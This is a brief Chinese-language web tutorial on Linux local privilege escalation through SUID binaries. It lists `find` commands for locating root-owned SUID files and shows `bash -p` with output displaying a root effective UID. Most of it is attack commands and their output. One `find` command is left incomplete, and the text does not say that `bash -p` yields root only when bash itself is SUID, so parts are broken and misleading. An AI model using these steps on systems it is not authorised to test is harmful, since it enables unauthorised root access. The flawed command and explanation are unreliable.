Linux下如何利用SUID提權

SUID是Linux的一種權限機制，具有這種權限的檔案會在執行時，使呼叫者暫時取得該檔案擁有者的權限。如果擁有SUID權限，那麼就可以利用系統中的二進位檔案和工具來進行root提權。

以下命令可以發現系統上執行的所有SUID可執行檔。具體來說，指令將嘗試尋找具有root權限的SUID的檔案。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

 

# 以上所有二進位檔案都會以root使用者權限執行，因為它們的權限中包含"s"，且對應的是root權限。

Bash

以下指令將以root權限開啟一個bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

#

以上是Linux下如何利用SUID提權的詳細內容。更多資訊請關注PHP中文網其他相關文章！